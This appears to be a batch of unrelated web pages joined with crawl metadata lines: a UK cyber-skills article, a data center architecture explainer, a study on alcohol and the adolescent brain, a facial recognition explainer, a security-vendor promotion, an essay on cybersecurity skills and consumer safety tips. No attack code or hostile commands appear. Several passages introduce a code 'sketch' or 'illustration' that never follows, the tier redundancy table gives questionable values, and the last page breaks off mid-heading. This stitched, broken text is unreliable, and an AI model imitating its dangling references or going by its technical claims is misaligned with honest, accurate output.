The nature of cyber threats affecting businesses are often specific and certain skills are in high demand, requiring training to develop them. Despite this, Government research has indicated that only 17% of businesses have invested in cyber security training in the last 12 months.
With the alarming rise in cyber-attacks against UK companies, the Government has quickly come to terms with the critical vulnerability the IT security skills gap is creating for the country’s economic security.
It is now backing initiatives that are enabling businesses to work collaboratively with the cyber security industry to recruit, train and develop IT security professionals.
The Cyber Security Challenge UK works with the government to provide one such initiative. Collaborating with UK businesses and cyber security firms, the initiative aims to find individuals with the appropriate skills and inspire them to pursue a career in the industry.
Similarly, a collaborative cyber security education scheme between government and industry has been launched which allows potential employers to track student’s progress – helping them transition straight into a career in the industry.
Schemes such as these offer a platform through which businesses can unearth and develop the UK’s cyber security talent. This is achieved by providing a gateway through which these businesses can witness this talent first-hand and fast-track it directly into cyber security roles.
This is proving vital for the cyber security industry as the school syllabus and the majority of university courses do not teach the basics of computer security.
This means the stream of talented graduates most industries have become used to hiring from does not exist for the cyber security sector. UK businesses therefore need to take it upon themselves to invest in the training and education of a skilled cyber security workforce.
Over the past few years this has started to become a reality. The UK is becoming more effective at contending with these threats as more and more companies invest in cyber security through collaborative projects and initiatives.
However, the lack of a well-trained workforce, coupled with the blistering pace of technological advancement, still poses a dire threat to UK businesses.
Trained professionals are the best line of defence when it comes to opposing this threat and investment in education and training will be key to achieving the number of professionals needed.
Sourced by Dr Robert L Nowill, chair of the board at the UK Cyber Security Challenge | <urn:uuid:3a68bdfa-a160-400a-9b8c-1a73e21c8033> | CC-MAIN-2024-38 | https://www.information-age.com/talent-drought-cyber-attacks-businesses-3965/ | 2024-09-12T15:56:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00787.warc.gz | en | 0.965777 | 963 | 2.734375 | 3 |
Data center architecture is the structured layout designed to support a data center’s computing, storage, and networking resources. It specifies how a multitude of components like servers, storage systems, and networking devices are organized and interconnected within a facility. The architecture is critical as it determines the data center’s efficiency, flexibility, and scalability, ensuring it can accommodate current and future IT demands. The constant evolution of computing technologies, increasing demand for resources, and the need for reliable, secure data storage and management necessitate a well-thought-out data center design.
A key component in data center design is the physical infrastructure, which encompasses space planning, power distribution, cooling systems, and physical security mechanisms. These elements support the core hardware and software systems, enabling the execution of a variety of applications and services that enterprises rely on. On top of the foundational infrastructure, data center network architecture interconnects the array of devices and facilitates communication between data storage solutions and computing resources, thereby forming the backbone of the data center’s capability to process and manage large volumes of data.
- Effective data center architecture must integrate servers, storage, and networking to support applications and services.
- The design and infrastructure of a data center are crucial for ensuring scalability, efficiency, and security.
- Continuous management and adoption of new technologies are necessary for maintaining operability and supporting business continuity.
Design Principles and Standards
When architects design data centers, they must adhere to defined principles and standards to ensure operational efficiency and reliability. Standards set by entities like the Uptime Institute provide a framework for scalability, redundancy, fault tolerance, and energy efficiency.
The Uptime Institute’s Tier Classification System is a critical standard in data center design. The system ranges from Tier I to Tier IV, categorizing facilities based on redundancy and fault tolerance. A Tier I center has a single path for power and cooling and no redundant components, offering limited protection against operational interruptions. Higher tiers improve on these aspects, culminating in Tier IV, which offers full fault tolerance and 96 hours of power outage protection.
- Scalability: Data centers must be designed to accommodate growth without compromising existing operations.
- Redundancy: Essential to ensure that backup systems are in place, such as power supplies or cooling systems, to maintain operations during component failures.
- Fault Tolerance: The architecture must tolerate and isolate faults to prevent them from affecting the entire system.
- Energy Efficiency: Critical in reducing operational costs and environmental impact. Implementing energy-efficient systems and designs is paramount.
Designers incorporate these principles as follows:
| Tier Level | Scalability | Redundancy | Fault Tolerance | Energy Efficiency |
| --- | --- | --- | --- | --- |
| Tier I | Limited | N/A | N/A | Standard |
| Tier II | Moderate | Partial | N/A | Improved |
| Tier III | High | N+1 | N+1 | High Efficiency |
| Tier IV | Highest | 2N+1 | 2(N+1) | Highest Efficiency |
In summary, companies must balance cost against the level of uptime required. While higher tiers offer greater protection and capability, they also demand a larger investment. Therefore, architects prioritize requirements to align the data center design with the organization’s objectives while complying with established standards for a robust and effective data environment.
The physical infrastructure of a data center underpins its functionality, providing a robust and secure environment for critical IT equipment such as servers and data storage devices.
Building and Space
A data center’s building must accommodate a variety of spatial needs. Construction of these facilities focuses on optimizing the space to support the scale of IT operations, which may include thousands of physical servers. Efficient use of space is critical, taking into consideration future growth and expansion potential.
Power Supply and Cooling Systems
Power is the lifeblood of a data center, with a redundant supply being crucial. Facilities typically employ a combination of uninterruptible power supplies (UPS) and backup generators to ensure a consistent power flow. Cooling systems, essential for dissipating heat, include ventilation and fans. Sophisticated cooling technologies ensure that equipment operates within safe temperature ranges, thus avoiding overheating.
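As a rough illustration of the redundancy arithmetic behind these designs, the sketch below checks whether a bank of identical UPS units satisfies the common N+1 criterion: the full load must still be carried after any single unit fails. The capacity figures are invented for illustration.

```python
def satisfies_n_plus_1(unit_capacity_kw, unit_count, load_kw):
    """Check whether losing any one identical UPS unit still leaves
    enough capacity to carry the full load (the N+1 criterion)."""
    if unit_count < 2:
        return False  # no spare unit to lose
    surviving_capacity = unit_capacity_kw * (unit_count - 1)
    return surviving_capacity >= load_kw

# Four 100 kW units feeding a 280 kW load: losing one leaves 300 kW.
print(satisfies_n_plus_1(100, 4, 280))  # True
# Three 100 kW units feeding the same load: losing one leaves only 200 kW.
print(satisfies_n_plus_1(100, 3, 280))  # False
```

The same arithmetic extends to chillers and other mechanical plant; higher tiers (2N, 2N+1) simply demand more surviving capacity.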
Security and Safety
Data centers prioritize both security and safety of their physical premises. They employ robust firewalls and controlled access points to secure the data within. Additionally, facilities are equipped with fire suppression systems and protocols to ensure safety against physical threats. These security measures are designed to safeguard against both external and internal risks.
Core Data Center Network Architecture
In the realm of data center network architecture, the core component serves as the pivotal point of connectivity and functionality, facilitating efficient data flow and providing robust support for the demanding network infrastructure.
Modern Networking Layout
Data center network (DCN) architecture has evolved to meet the increasing demands for scalability and performance in contemporary IT environments. The network fabric within modern data centers is designed to provide a resilient and flexible framework for data traffic. Crucial to the fabric’s efficiency are core layer switches, which interconnect with aggregate layer switches and the access layer, forming a hierarchical structure to manage the flow of information efficiently.
Components and Topology
- Access Layer: At the foundation of the structure, one finds the access layer, typically composed of access layer switches. These switches connect directly to servers, handling incoming and outgoing server traffic.
- Aggregate Layer: Also known as the distribution layer, the aggregate layer acts as a mediator, granting an effective communication bridge between the access and core layers. Aggregate layer switches help to consolidate data flow from multiple access switches before it is routed to the core layer.
- Core Layer: The core layer, at the apex of the data center network topology, is designed to be highly redundant and efficient, equipped with core layer switches that possess robust processing capabilities. These switches are pivotal in interconnecting different segments of the network, ensuring a smooth and uninterrupted flow of data. The layer employs high-performance routers and utilizes a mesh of cables and switches to sustain the high volume of cross-network traffic.
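To make the hierarchy concrete, here is a toy-scale sketch that models a small three-tier fabric and checks that traffic from an access switch can still reach the core when an aggregate switch fails. The switch names and link set are invented for illustration; real fabrics have far more devices and links.

```python
from collections import deque

# A toy three-tier fabric: each access switch uplinks to both aggregate
# switches, and each aggregate switch uplinks to both core switches.
links = {
    ("access1", "agg1"), ("access1", "agg2"),
    ("access2", "agg1"), ("access2", "agg2"),
    ("agg1", "core1"), ("agg1", "core2"),
    ("agg2", "core1"), ("agg2", "core2"),
}

def reachable(src, dst, failed=frozenset()):
    """Breadth-first search over the undirected link set, skipping
    any switches listed as failed."""
    adj = {}
    for a, b in links:
        adj.setdefault(a, set()).add(b)
        adj.setdefault(b, set()).add(a)
    seen, queue = {src}, deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            return True
        for nxt in adj.get(node, ()):
            if nxt not in seen and nxt not in failed:
                seen.add(nxt)
                queue.append(nxt)
    return False

print(reachable("access1", "core1"))                           # True
print(reachable("access1", "core1", failed={"agg1"}))          # True: agg2 carries the traffic
print(reachable("access1", "core1", failed={"agg1", "agg2"}))  # False: no aggregation path left
```

The middle case is the point of the aggregate layer's redundancy: a single switch failure is absorbed without isolating any servers.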
In constructing a DCN, the quality and capability of physical components such as routers, switches, and cables are fundamental, as they dictate the network’s overall performance and reliability. The choices made in network design and component selection are central to establishing a core architecture that meets present and future demands.
Data Storage Solutions
When designing a data center, choosing the right data storage solution is critical. Data storage in modern data centers has evolved to accommodate diversified needs, such as big data analysis, high-velocity file sharing, and robust storage systems that ensure data availability and integrity.
Cloud Storage and Object Stores: Solutions like Azure Blob Storage offer massively scalable object storage for text and binary data. This aligns well with big data storage requirements due to its scalability and the ability to handle large volumes of unstructured data.
On-Premises Storage: Many organizations opt for on-premises storage architectures to maintain control over their sensitive data. The key to effective on-premises storage lies in the right mix of hardware and virtualization, ensuring optimal usage of compute, storage, and networking resources.
Hybrid Arrays: Hybrid storage arrays combine both flash and hard disk drives to balance cost with performance, allowing for faster access where needed and cost-effective storage for less critical data.
- File Sharing Systems: Companies often deploy file sharing protocols within their storage solutions to facilitate collaboration and ease of data access. This allows for sharing large files within the data center network securely and efficiently.
Software-Defined Infrastructure (SDI): This approach abstracts the storage resources, pooling them to serve users more effectively. Through virtualization, resources can be allocated dynamically, leading to improved efficiency and reduced unused capacity.
In considering which data storage technology to adopt, factors such as data size, access speed, and application priority dictate the choice. It is imperative for a data center to align its storage technology with its overall goals and the specific demands of the data it holds.
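As a minimal sketch of the tiering idea behind hybrid arrays described above, the following places the most frequently accessed blocks on flash and lets everything else fall back to HDD. Real array controllers use far more sophisticated heuristics, and the block names and access counts here are invented.

```python
def place_blocks(access_counts, flash_capacity):
    """Greedy tiering: the most frequently accessed blocks go to the
    flash tier; everything else falls back to the HDD tier."""
    ranked = sorted(access_counts, key=access_counts.get, reverse=True)
    flash = set(ranked[:flash_capacity])
    hdd = set(ranked[flash_capacity:])
    return flash, hdd

# Hypothetical access counts per data block.
counts = {"db-index": 900, "logs": 40, "archive": 3, "user-table": 700}
flash, hdd = place_blocks(counts, flash_capacity=2)
print(sorted(flash))  # ['db-index', 'user-table']
print(sorted(hdd))    # ['archive', 'logs']
```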
Data centers house the critical computing resources that support a vast array of applications and workloads. These resources are meticulously managed and often deployed across various environments, including on-premises, public cloud, and at the edge, to ensure efficient and resilient operations.
Modern data centers deploy a multitude of servers, each designed to handle specific tasks and applications. Effective server management is paramount, involving the organization, alignment of resources, and ensuring that servers operate at optimal performance levels. In practice, this often includes:
- Monitoring system health and performance.
- Maintaining software updates and security patches.
- Allocating computing resources like CPU, memory, and storage to balance loads and maximize efficiency.
On-premises servers are managed directly within the facility, while multicloud and edge computing extend this management to include remote and distributed resources.
Virtualization and Cloud Solutions
Virtualization plays a critical role in data center architecture, abstracting hardware and creating multiple simulated environments or dedicated resources from a single physical setup. This technique enhances utilization rates and allows for:
- Efficient resource distribution through virtual machines (VMs).
- Rapid scalability to meet fluctuating demand.
- Isolation of workloads for increased security.
Cloud Computing has emerged as a transformative force, offering public cloud services that scale on demand and bring forth economic benefits. Data centers often employ a multicloud strategy to leverage the best services from different cloud providers, while cloud solutions like Containerization cater to the needs of modern applications, promoting agility and continuity.
By incorporating these sophisticated computing strategies, data centers deliver robust and versatile platforms for the ever-evolving landscape of digital services and requirements.
Network Services and Applications
The architecture of data centers incorporates an array of network services and applications to ensure efficient data throughput and low latency, vital for a spectrum of uses ranging from social media to machine learning.
Access and Distribution
In any data center, network access is the gateway through which users and devices connect to various applications. It optimizes user experience by enabling seamless entry to the network’s resources. The distribution layer acts as an intermediary, streamlining data flow between access and core layers, improving application performance and enhancing security measures.
- Access Layer Features:
- Provides connectivity for devices and end-users
- Implements policies for network access control
- Distribution Layer Functions:
- Aggregates data from access switches
- Routes and filters packets, balancing loads
Application Performance Management
Application Performance Management (APM) is a suite of analytics and management tools that monitor the performance of applications housed within a data center. They focus on two main aspects: throughput and latency which are crucial for maintaining an efficient operational environment.
- Throughput Maximization:
- Ensures data is transferred at high speeds
- Sustains the demands of high-volume applications like social media and email
- Latency Reduction:
- Decreases the delay in data transmission
- Critical for real-time applications, AI, and machine learning algorithms
APM tools not only provide visibility into the performance of applications but also help mitigate issues, ensuring consistent and reliable application delivery. By leveraging these tools, data centers can enhance user experience and the performance of advanced applications.
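As a simplified illustration of the two headline APM metrics, the following sketch turns a window of request samples into throughput and p95 latency. The request samples are fabricated and the percentile rule is deliberately naive; production APM tooling computes these far more carefully.

```python
def apm_summary(timestamps, latencies_ms):
    """Summarize a window of request samples into throughput
    (requests/second) and a rough p95 latency."""
    window_s = max(timestamps) - min(timestamps) or 1
    throughput = len(timestamps) / window_s
    ranked = sorted(latencies_ms)
    p95 = ranked[int(0.95 * (len(ranked) - 1))]  # naive index-based percentile
    return throughput, p95

# Ten requests over 5 seconds, one slow outlier.
ts = [0, 0.5, 1, 1.5, 2, 2.5, 3, 3.5, 4, 5]
lat = [12, 14, 11, 13, 15, 12, 16, 14, 13, 240]
throughput, p95 = apm_summary(ts, lat)
print(round(throughput, 1))  # 2.0
print(p95)                   # 16
```

Note how the p95 figure ignores the single 240 ms outlier while still capturing the tail of typical requests, which is why percentiles, not averages, dominate latency reporting.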
Operational management in data center architecture is crucial for businesses seeking reliability and high availability of services. It encompasses the organization and oversight of infrastructure, ensuring that systems run smoothly and meet specified service level agreements (SLAs).
Automation has emerged as a pivotal element within modern data centers to tackle complex processes that surpass human capabilities. It streamlines workflows, enables rapid scalability, and assists with real-time troubleshooting, significantly improving efficiency and reducing the potential for human error.
Effective operational management also involves continuous monitoring of both physical and virtual infrastructure elements. This real-time observation is integral to maintaining the operational integrity of the data center and providing insight for proactive maintenance and dynamic management responses.
| Key Component | Description |
| --- | --- |
| Management | Involves strategic planning, resource allocation, and administering policies. |
| Organization | Ensures optimal structuring of teams and technologies for maximum efficiency. |
| Service Level Agreements (SLAs) | Formalized agreements that help guarantee uptime, performance, and response times. |
| Troubleshooting | Identifies, diagnoses, and resolves issues swiftly to minimize the impact on services. |
Operational management serves as the backbone of business stability, with a direct impact on the availability of services. As data centers become larger and more complex, the approaches to managing such environments must also evolve with the same precision and efficiency.
Disaster Recovery and Business Continuity
In the context of data center architecture, disaster recovery (DR) and business continuity (BC) are crucial strategies to ensure operational resilience and regulatory compliance. Disaster recovery involves restoring IT and data center operations following a disruptive event. It outlines the processes to recover lost data and resume applications.
Resiliency plays a significant role in DR, referring to the data center’s ability to adapt and respond to risks, from natural disasters to cyber-attacks. Resilient data center architectures integrate redundancy and fault tolerance to mitigate potential disruptions.
Backup generators are a common physical safeguard in data centers. They provide an alternate power supply to maintain critical functions in the event of a power outage. The integration of these generators is a physical manifestation of business continuity principles.
Here are essential components in disaster recovery and business continuity planning:
- Objective Formulation:
- Defining Recovery Time Objectives (RTO)
- Establishing Recovery Point Objectives (RPO)
- Technology Tools:
- Utilizing replication technologies like Hitachi TrueCopy and Hitachi Universal Replicator
- Architecture Types:
- Hybrid constructs that balance cost with resilience
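A toy illustration of how RPO and RTO translate into checks against an actual backup regime: worst-case data loss equals the backup interval (the failure lands just before the next backup), and recovery time is the restore duration. The figures are invented, and real DR planning involves far more than two inequalities.

```python
def meets_objectives(backup_interval_h, restore_time_h, rpo_h, rto_h):
    """Check a simple backup regime against recovery objectives.
    Worst-case data loss is assumed equal to the backup interval."""
    return {
        "rpo_met": backup_interval_h <= rpo_h,
        "rto_met": restore_time_h <= rto_h,
    }

# Nightly backups (24 h apart) against a 4 h RPO clearly fall short,
# even though a 2 h restore beats an 8 h RTO.
print(meets_objectives(backup_interval_h=24, restore_time_h=2, rpo_h=4, rto_h=8))
# {'rpo_met': False, 'rto_met': True}
```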
Business continuity covers the entirety of operations and aims to maintain business functions during and after a disaster. It goes beyond data recovery, focusing on the continuous operation of the entire organization.
- DR is reactive, dealing primarily with data and system recovery.
- BC is proactive, encompassing a broader scope of sustained operations.
The synergy between disaster recovery and business continuity planning ensures that data centers can withstand and quickly recover from disruptions, thus maintaining uninterrupted business operations.
Frequently Asked Questions
Data center architecture is critical for successful IT operations, involving intricate design and detailed responsibilities. These FAQs address the core aspects, roles, designs, types, construction processes, and design standards central to the field.
What are the primary components involved in data center infrastructure?
The primary components of data center infrastructure typically include servers, storage systems, networking devices, power supplies, cooling systems, and physical racks. These elements work in unison to support the processing, storage, and dissemination of data.
What roles and responsibilities define a data center architect?
A data center architect is responsible for designing the layout and systems of a data center. They must ensure that the infrastructure is scalable, reliable, and efficient while meeting the data and computing requirements of the organization.
How is modern data center architecture typically designed?
Modern data center architecture is often designed with virtualization and modularity in mind to improve scalability and utilization. Emphasis is placed on energy efficiency, reducing the facility’s carbon footprint, and accommodating future technology integrations.
What are the key types of data center architectures currently in use?
Currently, data center architectures include traditional on-premises centers, colocation facilities, cloud data centers, edge computing centers, and centers utilizing modular or containerized designs. Each serves different needs and scales according to demand.
Can you describe the standard process for constructing a data center?
Constructing a data center commonly starts with thorough planning of the layout and infrastructure, followed by site selection, calculating power and cooling requirements, and ensuring compliance with industry standards. The actual construction phase carefully adheres to the predefined architectural design and planning.
What are the generally accepted design standards for data centers?
Design standards for data centers are guided by industry best practices and certifications such as those from Uptime Institute’s Tier Standard and ANSI/TIA-942. These standards dictate the specifications for redundancy, fault tolerance, and overall reliability.
Last Updated on February 12, 2024 by Josh Mahan | <urn:uuid:2dea1108-b946-4364-bd52-282ae2fc85da> | CC-MAIN-2024-38 | https://cc-techgroup.com/data-center-architecture/ | 2024-09-13T22:39:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00687.warc.gz | en | 0.907277 | 3,345 | 3.0625 | 3 |
Under 18, no alcohol.
In spite of this slogan, adolescents still have access to alcohol.
But how harmful is that one beer for the adolescent brain?
Research, including in Leiden, may provide the answer.
Over 43 per cent of young people between the ages of 14 and 18 have drunk alcohol at some point in time.
The adolescent brain is still developing and the consequences of moderate alcohol consumption are as yet not fully known. Dr Sabine Peters, from Leiden University, who is one of the researchers in this project, comments:
‘We think that the adolescent brain is more sensitive than the adult brain to alcohol, simply because the adolescent brain is still developing.
The connections between brain cells are not as robust as in adults, which means they are more easily disrupted.’
Existing brain scans
Leiden University is working with research groups at Erasmus MC, the Vrije Universiteit and UMC Utrecht.
These four institutions each analyse their own data, taken from existing brain scans of some 1,400 adolescents.
The research follows the adolescents over a number of years, during which two points in time are compared:
a point when the young people have never drunk alcohol and a point after they have.
These scans make it possible to map the consequences of alcohol use.
The researchers are also studying the effect of alcohol use on adolescents’ cognitive abilities.
The large-scale research project is taking place at the request of the Brain Foundation of the Netherlands.
‘We want to use this research to show the possible risk factors and make people more aware of them,’ commented Dr Loes van Herten, Head of the Healthy Brain department at the Brain Foundation.
‘Surprisingly enough, little research has been done on the effect of alcohol on the adolescent brain,’ Peters comments.
‘Most of the research has been done on animals, but it doesn’t really translate well into humans.’
Peters explains that the research focuses directly on replication.
‘We first look per research group at the effects of alcohol use on the adolescent brain.
We then look at whether we find the same outcomes with other datasets where some other factor is being measured.
To date, very little research has been done on this question, and certainly not in a replication study with several different large-scale datasets, so this is exciting research.’
The data that Leiden University is making available comes from the Brain Time study, a large-scale longitudinal study in which three hundred adolescents have taken part.
These young participants underwent MRI scans at two-year intervals, so that researchers could map the development of the brain. | <urn:uuid:0ee1f3e2-0f54-4793-a015-e3520d9b9247> | CC-MAIN-2024-38 | https://debuglies.com/2017/05/12/harmful-is-alcohol-for-the-adolescent-brain/ | 2024-09-13T23:06:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00687.warc.gz | en | 0.949187 | 559 | 3.3125 | 3 |
The term facial recognition is used to describe the process in which a computer application verifies a person’s identity. The software is used to detect the location of a specific face in a particular photo or video, and it’s wise enough to ignore other surrounding objects such as buildings, animals, cars or trees.
Now, simply from a person’s face, it is possible to tell people’s gender, their approximate age, whether they use glasses or not, and even how they are feeling. So there is no doubt that a human face is a rich source of very valuable information.
Human beings are able to process faces very quickly. It only takes us less than one second to recognize someone and even to determine how they are feeling. In the case of the software, however, it takes a more complex but very accurate process.
For the software, the process starts by examining the picture or video; it then determines whether there are any faces in that frame by distinguishing them from the background. This procedure is done despite poor illumination, camera distance or changes in the orientation of the face.
Difference between facial detection and facial recognition
You might be wondering… “But if the software detects a face, it is because it was recognized, right?” Not exactly – the two processes are related, but they are not the same thing.
Unfortunately, the terms facial detection and facial recognition have been misused, especially by the media, who often have a hard time distinguishing the two processes. As mentioned above, the idea is that in order to have facial recognition, first of all there must be facial detection.
Facial detection is the process in which the software determines, through algorithms, whether there are human faces in a picture or video. It does not determine a person’s identity; it only tells whether there are faces in there. For that reason, face detection does not store any information or detail about the detected person, it’s completely anonymous. So if the software detects a face in a particular picture, and this same face is detected again later on, it will not recognize that face as being the same person, since it will just provide a detection of a human face in a certain picture or frame. However, it will be able to keep some demographic information, such as gender or age of the person, being useful for demographic statistics. In conclusion, face detection by itself does not recognize an individual.
Facial recognition, on the other hand, automatically identifies a specific person. This means that the software makes a positive identification of a person’s face, in a photo or video, against an existing database of faces. This recognition is possible because the face has been previously enrolled into a database of subjects. In order for face recognition to provide a successful recognition, the face needs to be enrolled following some quality criteria, like frontality, illumination or face size (in pixels).
Next, the software will determine unique facial key points used to identify the specific person enrolled into the database. In the next place, the system will use these key points to compare them against the information from the new picture or video. And then, if the face has a high level of confidence it will mean that there is a ‘match’, so the concrete face will then have been ‘recognized’.
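As a toy-scale illustration of that matching step, here is a sketch that compares a probe face's feature vector against enrolled templates and declares a match only above a confidence threshold. The embeddings, names, and threshold below are invented; production systems use deep networks that produce vectors with hundreds of dimensions.

```python
import math

def cosine_similarity(a, b):
    """Cosine of the angle between two feature vectors: 1.0 means identical direction."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

# Hypothetical enrolled templates: identity -> embedding captured at enrollment.
enrolled = {
    "alice": (0.9, 0.1, 0.4),
    "bob": (0.1, 0.8, 0.5),
}

def recognize(probe, threshold=0.95):
    """Return the best-matching enrolled identity, or None if no
    template clears the confidence threshold."""
    best_name, best_score = None, 0.0
    for name, template in enrolled.items():
        score = cosine_similarity(probe, template)
        if score > best_score:
            best_name, best_score = name, score
    return best_name if best_score >= threshold else None

print(recognize((0.88, 0.12, 0.41)))  # 'alice'
print(recognize((0.0, 0.1, -0.9)))    # None: a face was detected, but nobody enrolled matches
```

The second call is the detection-without-recognition case from above: a perfectly valid face that simply matches no enrolled subject.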
There are many details that are necessary to recognize a person’s identity or characteristics, details that are undetectable to the human eye. But now, thanks to the incredible new technology developments, we are able to build hi-tech software that’s even capable of recognizing multiple faces in changeable and crowded environments, such as airports, train stations, shopping malls, sport stadiums…
As Herta’s CEO, Javier Rodríguez, says: “the human eye is the most perfect machine that exists – although a machine may hold in memory millions of faces that human beings could never recognize”.
Written by: Laura Blanc Pedregal | <urn:uuid:11267145-198e-4b94-a438-351df159d534> | CC-MAIN-2024-38 | https://hertasecurity.com/facial-recognition-the-explanation/ | 2024-09-15T02:45:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00587.warc.gz | en | 0.950541 | 825 | 3.609375 | 4 |
More and more companies and organizations are starting to realize the range of risks their physical facilities or information systems could face in today’s age of threats. System integration has been adopted more and more in recent years, and it is becoming a much more encompassing term. Usually, security system integration involves hooking up access control systems, CCTV systems, and alarm systems, but these days, we’re starting to incorporate more technologies into the arsenal. If you have heard of the term system integration, especially in the context of security technology, it is crucial to understand what the drawbacks and the benefits might be. Read on to learn more!
Improved Comprehensive Security
Integrated approaches can create a much-needed redundancy intended to increase the overall strength of an entire system in the event that one aspect of the security system is bypassed. If somebody were to duplicate the access control keycard, it might not be enough to get them into a secured parking lot if that lot is protected through a driver camera system. Any isolated system is subject to being entirely circumvented, but when it is combined together, it makes it a lot more challenging to bypass these security technologies. This is why system integration is so important.
Integrated systems also make spaces a lot more functional and more straightforward for those who should have full access. The benefit of these kinds of technologies is that they are usually designed around usability: instead of creating many mechanisms that a person has to be responsible for, like different keycards and passwords, they rely on credentials that are intrinsic to the user, like fingerprints, facial features, and answers to security questions. While keycards and passcodes might be utilized, developers of systems meant to be integrated are fully aware that carrying around various cards or remembering passwords is not efficient or practical.
Drawbacks and Difficulties
Historically, many security systems have been proprietary, forcing you to buy each element of your system from the same vendor. This has changed considerably in recent years, as many suppliers in the physical security industry recognize the importance of open, standards-based security technology.
Groundbreaking Technologies with Gatekeeper
Gatekeeper Security’s suite of intelligent optical technologies provides security personnel with the tools to detect today’s threats. Our systems help those in the energy, transportation, commercial, and government sectors protect their people and their valuables by detecting threats in time to act. From automatic under-vehicle inspection systems and automatic license plate reader systems to on-the-move automatic vehicle occupant identifiers, we offer full 360-degree vehicle scanning to ensure any threat is found. In 376 countries around the globe, Gatekeeper Security’s technology is trusted to help protect critical infrastructure. Follow us on Facebook and LinkedIn for updates about our technology and company.
In the dynamic and ever-evolving landscape of cybersecurity, professionals need a diverse skill set to stay ahead of malicious actors. This exploration delves into the essential cybersecurity skills that empower professionals to navigate the digital battlefield, protecting organizations and individuals from an array of cyber threats.
Technical Proficiency: The Foundation of Cyber Defense
Technical proficiency forms the cornerstone of cybersecurity skills. Professionals must be adept in areas such as network security, encryption, penetration testing, and vulnerability assessment. Mastery of tools and technologies is essential to identify, mitigate, and prevent cyber threats effectively.
Incident Response and Forensics: Rapid and Informed Action
In the event of a cyber incident, the ability to respond swiftly and conduct digital forensics is crucial. Cybersecurity professionals need skills in incident response to mitigate damage, identify the source of the breach, and develop strategies to prevent future occurrences.
Security Architecture and Design: Building Fortified Systems
Designing secure systems and architectures is a proactive measure in cybersecurity. Professionals must possess skills in creating robust security frameworks, implementing access controls, and ensuring that security is ingrained in the development lifecycle of applications and infrastructure.
Threat Intelligence Analysis: Staying One Step Ahead
Understanding the threat landscape is paramount in cybersecurity. Professionals need skills in threat intelligence analysis to interpret patterns, identify emerging threats, and formulate proactive strategies to fortify defenses. This skill enables organizations to stay one step ahead of potential cyber adversaries.
Coding and Scripting: Crafting Secure Solutions
A strong foundation in coding and scripting languages is invaluable for cybersecurity professionals. Whether it’s reviewing source code for vulnerabilities or crafting scripts for automation, coding skills contribute to creating and maintaining secure software and systems.
Soft Skills: Communication and Collaboration
In addition to technical acumen, cybersecurity professionals require strong soft skills. Effective communication and collaboration are essential when conveying complex security concepts to non-technical stakeholders, collaborating with cross-functional teams, and fostering a culture of security awareness within organizations.
Adaptability and Continuous Learning: Staying Ahead of Trends
The cybersecurity landscape evolves rapidly, requiring professionals to be adaptable and committed to continuous learning. Keeping abreast of emerging threats, new technologies, and evolving security best practices is crucial to maintaining effective digital defense strategies.
Ethical Hacking: Proactive Defense through Simulation
Ethical hacking, or penetration testing, involves simulating cyberattacks to identify vulnerabilities before malicious actors exploit them. Cybersecurity professionals with skills in ethical hacking play a proactive role in securing systems by identifying and patching potential weaknesses.
Cryptography: Safeguarding Information in Transit
A profound understanding of cryptography is essential for cybersecurity professionals. From encrypting sensitive data to securing communication channels, cryptography is a fundamental skill. Professionals must grasp both symmetric and asymmetric encryption methods, as well as the application of cryptographic protocols to ensure secure communication and data protection.
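As a small, illustrative sketch of symmetric-key techniques in practice (Python standard library only; the key, message, and function names are invented for the example), the snippet below uses an HMAC to protect a message's integrity, the same primitive that underpins many cryptographic protocols:

```python
import hashlib
import hmac
import secrets

# Hypothetical shared symmetric key, e.g. agreed out of band by both parties
key = secrets.token_bytes(32)
msg = b"transfer $100 to account 42"

# The sender attaches an authentication tag computed over the message
tag = hmac.new(key, msg, hashlib.sha256).hexdigest()

def verify(key: bytes, msg: bytes, tag: str) -> bool:
    """Recompute the tag and compare in constant time to resist timing attacks."""
    expected = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)
```

A receiver holding the same key accepts the message only if `verify` returns `True`; any tampering with the message or the tag fails the check. Real transport security (such as TLS) combines integrity checks like this with encryption and asymmetric key exchange.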
Risk Management: Balancing Security and Business Objectives
Effective cybersecurity is not just about blocking every potential threat; it’s about managing risk. Professionals need skills in risk management to assess potential vulnerabilities, prioritize threats based on their impact, and develop strategies that align with broader business objectives. This skill ensures that security measures contribute positively to the overall success of an organization.
Conclusion: Empowering Cyber Warriors for a Secure Future
In conclusion, the field of cybersecurity demands a diverse skill set that blends technical expertise with soft skills and a commitment to continuous learning. Cybersecurity professionals, armed with these essential skills, become the frontline defenders in the digital realm, safeguarding organizations and individuals from evolving cyber threats. | <urn:uuid:3d19f806-0677-4f0a-8be6-af5749703101> | CC-MAIN-2024-38 | https://garage4hackers.com/cybersecurity-skills-for-todays-professionals/ | 2024-09-12T18:53:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00887.warc.gz | en | 0.895999 | 726 | 3.0625 | 3 |
This week is National Consumer Protection Week, and while there are many threats to our user data and personal information, there are also a multitude of ways we can protect ourselves. Some examples of best practices are:
- Using a credit card rather than a debit card - this prevents you from needing to enter a PIN in public, where people can visually capture your input.
- Using Apple Pay or Google Pay - these applications store your credit card so you do not need to physically access the card to use it.
- Using a unique PIN for debit cards - and not reusing that PIN for unlocking cell phones, as a voicemail code, etc.
- Never sharing passwords, account access, or credit and debit cards with others.
There are other, more advanced threats to the security of your devices. It is important to be aware of them as this increases your ability to protect yourself from them.
It's Consumer Protection Week - Here's 4 Ways to be Safer Online
There are far more than four ways to stay safe online, but these ideas can be implemented immediately. Most importantly, remember to slow down when you feel pressured. Hackers often use scare tactics that appeal to your emotions rather than your rational judgment to get you to act without thinking. If you stop and consider what is going on before reacting, you will be far less likely to make a big mistake.
Reduce the amount you rely upon search
